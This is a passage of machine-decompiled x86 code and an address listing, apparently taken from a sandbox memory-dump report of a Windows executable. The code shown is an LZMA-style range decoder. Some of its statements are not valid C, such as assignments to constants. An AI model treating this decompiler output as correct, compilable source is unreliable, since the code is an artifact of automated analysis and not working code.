												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                                                    0x00000000
                                                    0x0040711c
                                                    0x0040711c
                                                    0x00407120
                                                    0x0040712d
                                                    0x00407137
                                                    0x00000000
                                                    0x00407122
                                                    0x00407122
                                                    0x0040715d
                                                    0x00407160
                                                    0x00407163
                                                    0x00407166
                                                    0x00407166
                                                    0x00407169
                                                    0x00407170
                                                    0x00407175
                                                    0x00407056
                                                    0x00407059
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040741c
                                                    0x00407420
                                                    0x004075cf
                                                    0x004075e5
                                                    0x004075ed
                                                    0x004075f4
                                                    0x004075f6
                                                    0x004075fd
                                                    0x00407601
                                                    0x00407601
                                                    0x0040742c
                                                    0x00407433
                                                    0x0040743b
                                                    0x0040743e
                                                    0x00407441
                                                    0x00407441
                                                    0x00407447
                                                    0x00407447
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406be3
                                                    0x00406bec
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x00000000
                                                    0x00406bfd
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c06
                                                    0x00406c09
                                                    0x00406c0c
                                                    0x00406c10
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c16
                                                    0x00406c19
                                                    0x00406c1b
                                                    0x00406c1c
                                                    0x00406c1f
                                                    0x00406c21
                                                    0x00406c22
                                                    0x00406c24
                                                    0x00406c27
                                                    0x00406c2c
                                                    0x00406c31
                                                    0x00406c3a
                                                    0x00406c4d
                                                    0x00406c50
                                                    0x00406c5c
                                                    0x00406c84
                                                    0x00406c86
                                                    0x00406c94
                                                    0x00406c94
                                                    0x00406c98
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c88
                                                    0x00406c8b
                                                    0x00406c8c
                                                    0x00406c8c
                                                    0x00000000
                                                    0x00406c88
                                                    0x00406c62
                                                    0x00406c67
                                                    0x00406c67
                                                    0x00406c70
                                                    0x00406c78
                                                    0x00406c7b
                                                    0x00000000
                                                    0x00406c81
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c81
                                                    0x00000000
                                                    0x00406c9e
                                                    0x00406c9e
                                                    0x00406ca2
                                                    0x0040754e
                                                    0x00000000
                                                    0x0040754e
                                                    0x00406cab
                                                    0x00406cbb
                                                    0x00406cbe
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc1
                                                    0x00406cc4
                                                    0x00406cc8
                                                    0x00000000
                                                    0x00000000
                                                    0x00406cca
                                                    0x00406cd0
                                                    0x00406cfa
                                                    0x00406d00
                                                    0x00406d07
                                                    0x00000000
                                                    0x00406d07
                                                    0x00406cd6
                                                    0x00406cd9
                                                    0x00406cde
                                                    0x00406cde
                                                    0x00406ce9
                                                    0x00406cf1
                                                    0x00406cf4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d39
                                                    0x00406d3f
                                                    0x00406d42
                                                    0x00406d4f
                                                    0x00406d57
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d0e
                                                    0x00406d0e
                                                    0x00406d12
                                                    0x0040755d
                                                    0x00000000
                                                    0x0040755d
                                                    0x00406d1e
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d29
                                                    0x00406d2c
                                                    0x00406d2f
                                                    0x00406d32
                                                    0x00406d37
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x004073ce
                                                    0x004073ce
                                                    0x004073d4
                                                    0x004073da
                                                    0x004073e0
                                                    0x004073fa
                                                    0x004073fd
                                                    0x00407403
                                                    0x0040740e
                                                    0x00407410
                                                    0x004073e2
                                                    0x004073e2
                                                    0x004073f1
                                                    0x004073f5
                                                    0x004073f5
                                                    0x0040741a
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00406d5f
                                                    0x00406d61
                                                    0x00406d64
                                                    0x00406dd5
                                                    0x00406dd8
                                                    0x00406ddb
                                                    0x00406de2
                                                    0x00406dec
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00406d66
                                                    0x00406d6a
                                                    0x00406d6d
                                                    0x00406d6f
                                                    0x00406d72
                                                    0x00406d75
                                                    0x00406d77
                                                    0x00406d7a
                                                    0x00406d7c
                                                    0x00406d81
                                                    0x00406d84
                                                    0x00406d87
                                                    0x00406d8b
                                                    0x00406d92
                                                    0x00406d95
                                                    0x00406d9c
                                                    0x00406da0
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da8
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406da2
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406d97
                                                    0x00406dac
                                                    0x00406daf
                                                    0x00406dcd
                                                    0x00406dcf
                                                    0x00000000
                                                    0x00406db1
                                                    0x00406db1
                                                    0x00406db4
                                                    0x00406db7
                                                    0x00406dba
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbc
                                                    0x00406dbf
                                                    0x00406dc2
                                                    0x00406dc4
                                                    0x00406dc5
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406dc8
                                                    0x00000000
                                                    0x00406ffe
                                                    0x00407002
                                                    0x00407020
                                                    0x00407023
                                                    0x0040702a
                                                    0x0040702d
                                                    0x00407030
                                                    0x00407033
                                                    0x00407036
                                                    0x00407039
                                                    0x0040703b
                                                    0x00407042
                                                    0x00407043
                                                    0x00407045
                                                    0x00407048
                                                    0x0040704b
                                                    0x0040704e
                                                    0x0040704e
                                                    0x00407053
                                                    0x00000000
                                                    0x00407053
                                                    0x00407004
                                                    0x00407007
                                                    0x0040700a
                                                    0x00407014
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x00000000
                                                    0x00407068
                                                    0x0040706c
                                                    0x0040708f
                                                    0x00407092
                                                    0x00407095
                                                    0x0040709f
                                                    0x0040706e
                                                    0x0040706e
                                                    0x00407071
                                                    0x00407074
                                                    0x00407077
                                                    0x00407084
                                                    0x00407087
                                                    0x00407087
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x00000000
                                                    0x004070ab
                                                    0x004070af
                                                    0x00000000
                                                    0x00000000
                                                    0x004070b5
                                                    0x004070b9
                                                    0x00000000
                                                    0x00000000
                                                    0x004070bf
                                                    0x004070c1
                                                    0x004070c5
                                                    0x004070c5
                                                    0x004070c8
                                                    0x004070cc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00407143
                                                    0x00407147
                                                    0x0040714e
                                                    0x00407151
                                                    0x00407154
                                                    0x00407149
                                                    0x00407149
                                                    0x00407149
                                                    0x00407157
                                                    0x0040715a
                                                    0x00000000
                                                    0x00000000
                                                    0x00407203
                                                    0x00407203
                                                    0x00407207
                                                    0x004075a5
                                                    0x00000000
                                                    0x004075a5
                                                    0x0040720d
                                                    0x00407210
                                                    0x00407213
                                                    0x00407217
                                                    0x0040721a
                                                    0x00407220
                                                    0x00407222
                                                    0x00407222
                                                    0x00407222
                                                    0x00407225
                                                    0x00407228
                                                    0x00000000
                                                    0x00000000
                                                    0x00406df8
                                                    0x00406df8
                                                    0x00406dfc
                                                    0x00407569
                                                    0x00000000
                                                    0x00407569
                                                    0x00406e02
                                                    0x00406e05
                                                    0x00406e08
                                                    0x00406e0c
                                                    0x00406e0f
                                                    0x00406e15
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e17
                                                    0x00406e1a
                                                    0x00406e1d
                                                    0x00406e1d
                                                    0x00406e20
                                                    0x00406e23
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e29
                                                    0x00406e2f
                                                    0x00000000
                                                    0x00000000
                                                    0x00406e35
                                                    0x00406e35
                                                    0x00406e39
                                                    0x00406e3c
                                                    0x00406e3f
                                                    0x00406e42
                                                    0x00406e45
                                                    0x00406e46
                                                    0x00406e49
                                                    0x00406e4b
                                                    0x00406e51
                                                    0x00406e54
                                                    0x00406e57
                                                    0x00406e5a
                                                    0x00406e5d
                                                    0x00406e60
                                                    0x00406e63
                                                    0x00406e7f
                                                    0x00406e82
                                                    0x00406e85
                                                    0x00406e88
                                                    0x00406e8f
                                                    0x00406e93
                                                    0x00406e95
                                                    0x00406e99
                                                    0x00406e65
                                                    0x00406e65
                                                    0x00406e69
                                                    0x00406e71
                                                    0x00406e76
                                                    0x00406e78
                                                    0x00406e7a
                                                    0x00406e7a
                                                    0x00406e9c
                                                    0x00406ea3
                                                    0x00406ea6
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eac
                                                    0x00000000
                                                    0x00406eb1
                                                    0x00406eb1
                                                    0x00406eb5
                                                    0x00407575
                                                    0x00000000
                                                    0x00407575
                                                    0x00406ebb
                                                    0x00406ebe
                                                    0x00406ec1
                                                    0x00406ec5
                                                    0x00406ec8
                                                    0x00406ece
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed0
                                                    0x00406ed3
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406ed6
                                                    0x00406edc
                                                    0x00000000
                                                    0x00000000
                                                    0x00406ede
                                                    0x00406ee1
                                                    0x00406ee4
                                                    0x00406ee7
                                                    0x00406eea
                                                    0x00406eed
                                                    0x00406ef0
                                                    0x00406ef3
                                                    0x00406ef6
                                                    0x00406ef9
                                                    0x00406efc
                                                    0x00406f14
                                                    0x00406f17
                                                    0x00406f1a
                                                    0x00406f1d
                                                    0x00406f1d
                                                    0x00406f20
                                                    0x00406f24
                                                    0x00406f26
                                                    0x00406efe
                                                    0x00406efe
                                                    0x00406f06
                                                    0x00406f0b
                                                    0x00406f0d
                                                    0x00406f0f
                                                    0x00406f0f
                                                    0x00406f29
                                                    0x00406f30
                                                    0x00406f33
                                                    0x00000000
                                                    0x00406f35
                                                    0x00000000
                                                    0x00406f35
                                                    0x00406f33
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00406f3a
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f75
                                                    0x00406f75
                                                    0x00406f79
                                                    0x00407581
                                                    0x00000000
                                                    0x00407581
                                                    0x00406f7f
                                                    0x00406f82
                                                    0x00406f85
                                                    0x00406f89
                                                    0x00406f8c
                                                    0x00406f92
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f94
                                                    0x00406f97
                                                    0x00406f9a
                                                    0x00406f9a
                                                    0x00406fa0
                                                    0x00406f3e
                                                    0x00406f3e
                                                    0x00406f41
                                                    0x00000000
                                                    0x00406f41
                                                    0x00406fa2
                                                    0x00406fa2
                                                    0x00406fa5
                                                    0x00406fa8
                                                    0x00406fab
                                                    0x00406fae
                                                    0x00406fb1
                                                    0x00406fb4
                                                    0x00406fb7
                                                    0x00406fba
                                                    0x00406fbd
                                                    0x00406fc0
                                                    0x00406fd8
                                                    0x00406fdb
                                                    0x00406fde
                                                    0x00406fe1
                                                    0x00406fe1
                                                    0x00406fe4
                                                    0x00406fe8
                                                    0x00406fea
                                                    0x00406fc2
                                                    0x00406fc2
                                                    0x00406fca
                                                    0x00406fcf
                                                    0x00406fd1
                                                    0x00406fd3
                                                    0x00406fd3
                                                    0x00406fed
                                                    0x00406ff4
                                                    0x00406ff7
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00406ff9
                                                    0x00000000
                                                    0x00407286
                                                    0x00407286
                                                    0x0040728a
                                                    0x004075b1
                                                    0x00000000
                                                    0x004075b1
                                                    0x00407290
                                                    0x00407293
                                                    0x00407296
                                                    0x0040729a
                                                    0x0040729d
                                                    0x004072a3
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a5
                                                    0x004072a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00407395
                                                    0x00407399
                                                    0x004073bb
                                                    0x004073be
                                                    0x004073c8
                                                    0x004073cb
                                                    0x004073cb
                                                    0x004073cb
                                                    0x00000000
                                                    0x004073cb
                                                    0x004073cb
                                                    0x0040739b
                                                    0x0040739e
                                                    0x004073a2
                                                    0x004073a5
                                                    0x004073a5
                                                    0x004073a8
                                                    0x00000000
                                                    0x00000000
                                                    0x00407452
                                                    0x00407456
                                                    0x00407474
                                                    0x00407474
                                                    0x00407474
                                                    0x0040747b
                                                    0x00407482
                                                    0x00407489
                                                    0x00407489
                                                    0x00000000
                                                    0x00407489
                                                    0x00407458
                                                    0x0040745b
                                                    0x0040745e
                                                    0x00407461
                                                    0x00407468
                                                    0x004073ac
                                                    0x004073ac
                                                    0x004073af
                                                    0x00000000
                                                    0x00000000
                                                    0x00407543
                                                    0x00407546
                                                    0x00407447
                                                    0x00000000
                                                    0x00000000
                                                    0x0040717d
                                                    0x0040717f
                                                    0x00407186
                                                    0x00407187
                                                    0x00407189
                                                    0x0040718c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407194
                                                    0x00407197
                                                    0x0040719a
                                                    0x0040719c
                                                    0x0040719e
                                                    0x0040719e
                                                    0x0040719f
                                                    0x004071a2
                                                    0x004071a9
                                                    0x004071ac
                                                    0x004071ba
                                                    0x00000000
                                                    0x00000000
                                                    0x00407490
                                                    0x00407490
                                                    0x00407493
                                                    0x0040749a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040749f
                                                    0x0040749f
                                                    0x004074a3
                                                    0x004075db
                                                    0x00000000
                                                    0x004075db
                                                    0x004074a9
                                                    0x004074ac
                                                    0x004074af
                                                    0x004074b3
                                                    0x004074b6
                                                    0x004074bc
                                                    0x004074be
                                                    0x004074be
                                                    0x004074be
                                                    0x004074c1
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c4
                                                    0x004074c7
                                                    0x004074c7
                                                    0x004074cb
                                                    0x0040752b
                                                    0x0040752e
                                                    0x00407533
                                                    0x00407534
                                                    0x00407536
                                                    0x00407538
                                                    0x0040753b
                                                    0x00407447
                                                    0x00407447
                                                    0x00000000
                                                    0x0040744d
                                                    0x00407447
                                                    0x004074cd
                                                    0x004074d3
                                                    0x004074d6
                                                    0x004074d9
                                                    0x004074dc
                                                    0x004074df
                                                    0x004074e2
                                                    0x004074e5
                                                    0x004074e8
                                                    0x004074eb
                                                    0x004074ee
                                                    0x00407507
                                                    0x0040750a
                                                    0x0040750d
                                                    0x00407510
                                                    0x00407514
                                                    0x00407516
                                                    0x00407516
                                                    0x00407517
                                                    0x0040751a
                                                    0x004074f0
                                                    0x004074f0
                                                    0x004074f8
                                                    0x004074fd
                                                    0x004074ff
                                                    0x00407502
                                                    0x00407502
                                                    0x0040751d
                                                    0x00407524
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x00407526
                                                    0x00000000
                                                    0x004071c2
                                                    0x004071c5
                                                    0x004071fb
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732b
                                                    0x0040732e
                                                    0x0040732e
                                                    0x00407331
                                                    0x00407333
                                                    0x004075bd
                                                    0x00000000
                                                    0x004075bd
                                                    0x00407339
                                                    0x0040733c
                                                    0x00000000
                                                    0x00000000
                                                    0x00407342
                                                    0x00407346
                                                    0x00407349
                                                    0x00407349
                                                    0x00407349
                                                    0x00000000
                                                    0x00407349
                                                    0x004071c7
                                                    0x004071c9
                                                    0x004071cb
                                                    0x004071cd
                                                    0x004071d0
                                                    0x004071d1
                                                    0x004071d3
                                                    0x004071d5
                                                    0x004071d8
                                                    0x004071db
                                                    0x004071f1
                                                    0x004071f6
                                                    0x0040722e
                                                    0x0040722e
                                                    0x00407232
                                                    0x0040725e
                                                    0x00407260
                                                    0x00407267
                                                    0x0040726a
                                                    0x0040726d
                                                    0x0040726d
                                                    0x00407272
                                                    0x00407272
                                                    0x00407274
                                                    0x00407277
                                                    0x0040727e
                                                    0x00407281
                                                    0x004072ae
                                                    0x004072ae
                                                    0x004072b1
                                                    0x004072b4
                                                    0x00407328
                                                    0x00407328
                                                    0x00407328
                                                    0x00000000
                                                    0x00407328
                                                    0x004072b6
                                                    0x004072bc
                                                    0x004072bf
                                                    0x004072c2
                                                    0x004072c5
                                                    0x004072c8
                                                    0x004072cb
                                                    0x004072ce
                                                    0x004072d1
                                                    0x004072d4
                                                    0x004072d7
                                                    0x004072f0
                                                    0x004072f2
                                                    0x004072f5
                                                    0x004072f6
                                                    0x004072f9
                                                    0x004072fb
                                                    0x004072fe
                                                    0x00407300
                                                    0x00407302
                                                    0x00407305
                                                    0x00407307
                                                    0x0040730a
                                                    0x0040730e
                                                    0x00407310
                                                    0x00407310
                                                    0x00407311
                                                    0x00407314
                                                    0x00407317
                                                    0x004072d9
                                                    0x004072d9
                                                    0x004072e1
                                                    0x004072e6
                                                    0x004072e8
                                                    0x004072eb
                                                    0x004072eb
                                                    0x0040731a
                                                    0x00407321
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x004072ab
                                                    0x00000000
                                                    0x00407323
                                                    0x00000000
                                                    0x00407323
                                                    0x00407321
                                                    0x00407234
                                                    0x00407237
                                                    0x00407239
                                                    0x0040723c
                                                    0x0040723f
                                                    0x00407242
                                                    0x00407244
                                                    0x00407247
                                                    0x0040724a
                                                    0x0040724a
                                                    0x0040724d
                                                    0x0040724d
                                                    0x00407250
                                                    0x00407257
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x0040722b
                                                    0x00000000
                                                    0x00407259
                                                    0x00000000
                                                    0x00407259
                                                    0x00407257
                                                    0x004071dd
                                                    0x004071e0
                                                    0x004071e2
                                                    0x004071e5
                                                    0x00000000
                                                    0x00000000
                                                    0x00406f44
                                                    0x00406f44
                                                    0x00406f48
                                                    0x0040758d
                                                    0x00000000
                                                    0x0040758d
                                                    0x00406f4e
                                                    0x00406f51
                                                    0x00406f54
                                                    0x00406f57
                                                    0x00406f5a
                                                    0x00406f5d
                                                    0x00406f60
                                                    0x00406f62
                                                    0x00406f65
                                                    0x00406f68
                                                    0x00406f6b
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00406f6d
                                                    0x00000000
                                                    0x00000000
                                                    0x004070cf
                                                    0x004070cf
                                                    0x004070d3
                                                    0x00407599
                                                    0x00000000
                                                    0x00407599
                                                    0x004070d9
                                                    0x004070dc
                                                    0x004070df
                                                    0x004070e2
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e4
                                                    0x004070e7
                                                    0x004070ea
                                                    0x004070ed
                                                    0x004070f0
                                                    0x004070f3
                                                    0x004070f6
                                                    0x004070f7
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070f9
                                                    0x004070fc
                                                    0x004070ff
                                                    0x00407102
                                                    0x00407105
                                                    0x00407105
                                                    0x00407105
                                                    0x00407108
                                                    0x0040710a
                                                    0x0040710a
                                                    0x00000000
                                                    0x00000000
                                                    0x0040734c
                                                    0x0040734c
                                                    0x0040734c
                                                    0x00407350
                                                    0x00000000
                                                    0x00000000
                                                    0x00407356
                                                    0x00407359
                                                    0x0040735c
                                                    0x0040735f
                                                    0x00407361
                                                    0x00407361
                                                    0x00407361
                                                    0x00407364
                                                    0x00407367
                                                    0x0040736a
                                                    0x0040736d
                                                    0x00407370
                                                    0x00407373
                                                    0x00407374
                                                    0x00407376
                                                    0x00407376
                                                    0x00407376
                                                    0x00407379
                                                    0x0040737c
                                                    0x0040737f
                                                    0x00407382
                                                    0x00407385
                                                    0x00407389
                                                    0x0040738b
                                                    0x0040738e
                                                    0x00000000
                                                    0x00407390
                                                    0x0040710d
                                                    0x0040710d
                                                    0x00000000
                                                    0x0040710d
                                                    0x0040738e
                                                    0x004075c3
                                                    0x00000000
                                                    0x00000000
                                                    0x00406bf2
                                                    0x004075fa
                                                    0x004075fa
                                                    0x00000000
                                                    0x004075fa
                                                    0x00407447
                                                    0x004073ce
                                                    0x004073cb
                                                    0x00000000
                                                    0x00407120

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.306521689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
